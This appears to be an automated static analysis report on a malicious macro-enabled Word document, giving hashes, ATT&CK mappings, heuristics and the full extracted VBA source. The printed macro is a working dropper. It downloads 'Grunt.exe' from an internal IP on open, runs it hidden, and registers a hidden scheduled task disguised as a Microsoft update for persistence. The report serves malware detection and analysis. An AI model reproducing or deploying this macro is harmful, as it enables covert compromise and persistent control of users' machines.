Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 70f736f82bba33b3…

MALICIOUS

Office (OOXML)

18.9 KB Created: 2021-07-09 02:53:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-07-13
MD5: 0bd740d636a32c1f39de35855c91f685 SHA-1: bec2c94d9b04b4b68e2d3c29b184a1132a900301 SHA-256: 70f736f82bba33b3b1cf7933a0302cffbcd9740d7a55b90772c7aa9360078db0
358 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The AutoOpen macro executes a function that downloads a payload named 'Grunt.exe' from 'the embedded link'. It then uses Shell() to execute the downloaded file and attempts to establish persistence by creating a scheduled task. The ClamAV detection 'Doc.Downloader.Valyria-10002610-0' further confirms its malicious nature.

Heuristics 9

  • ClamAV: Doc.Downloader.Valyria-10002610-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10002610-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell path, vbHide
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        oStream.Write WinHttpReq.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        path = Environ("TEMP") & "\" & Payload
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.20.107 Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3671 bytes
SHA-256: 8d64f908d7e64329fe6a8d7fd6617d3cc9d641cffd89518f898628708f208c4a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
    'Define our malicious execution
    Dim Payload As String
    Payload = "Grunt.exe"
    Dim Server As String
    Server = "http://192.168.20.107"
    Dim path As String
    path = Download(Server, Payload)
    Shell path, vbHide
    Persist (path)
End Sub

Private Function Download(Server As String, Payload As String) As String
    'Download and save the payload, then return its path...
    Dim path As String
    path = Environ("TEMP") & "\" & Payload
    Dim url As String
    url = Server & "/" & Payload
    
    'Get the thing...
    Dim WinHttpReq
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", url, False
    WinHttpReq.Send
    
    'Check it was successful...
    If WinHttpReq.Status <> 200 Then
        Exit Function
    End If
    
    'Write to disk...
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile path, 2
    oStream.Close
    Download = path
    Shell path, vbHide
End Function

Private Function Persist(Payload As String)
    'Create and execute the scheduled task...
    
    'Get the COM Scheduling Service and connect
    Set service = CreateObject("Schedule.Service")
    service.Connect
    
    'Get the root folder
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    
    'Create a new task definition
    Dim taskDefinition
    Set taskDefinition = service.newTask(0)
    
    'Perform basic T1036 masquerading
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "Microsoft Update Service"
    regInfo.Author = "Microsoft Corporation"
    
    'Have the task run as the compromised user
    Dim principal
    Set principal = taskDefinition.principal
    principal.LogonType = 3
    
    'Define a trigger for our service
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(9)
    trigger.ID = "LogonTriggerId"
    trigger.Enabled = True
    trigger.UserId = Environ("USERDOMAIN") & "\" & Environ("USERNAME")
    trigger.Delay = "PT1M"  'Delay service execution
    
    'Get settings
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
        
    'T1158: Hidden Files and Directories (and now services)
    settings.Hidden = True
      
    'Prevent our service from timing-out
    settings.ExecutionTimeLimit = "PT0S"
    settings.AllowHardTerminate = False
      
    'Avoid duplicate services
    settings.MultipleInstances = 2
      
    'Restart our service after 1 minute if we crash
    settings.RestartInterval = "PT1M"
      
    'Restart our service many, many... many times
    settings.RestartCount = 999
      
    'Ensure our service runs, regardless of the battery status
    settings.StopIfGoingOnBatteries = False
    settings.DisallowStartIfOnBatteries = False
    
    'Define our service's action
    Dim Action
    Set Action = taskDefinition.Actions.Create(0)
    Action.path = Payload
    
    'Register our task
    Dim task
    Set task = rootFolder.RegisterTaskDefinition("Microsoft Update Service", taskDefinition, 6, , , 3)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15360 bytes
SHA-256: 9a696ea3f242b6c98c651b0624c966e18048fe0f543db6be3a03ac0729915777
Detection
ClamAV: Doc.Downloader.Valyria-10002610-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.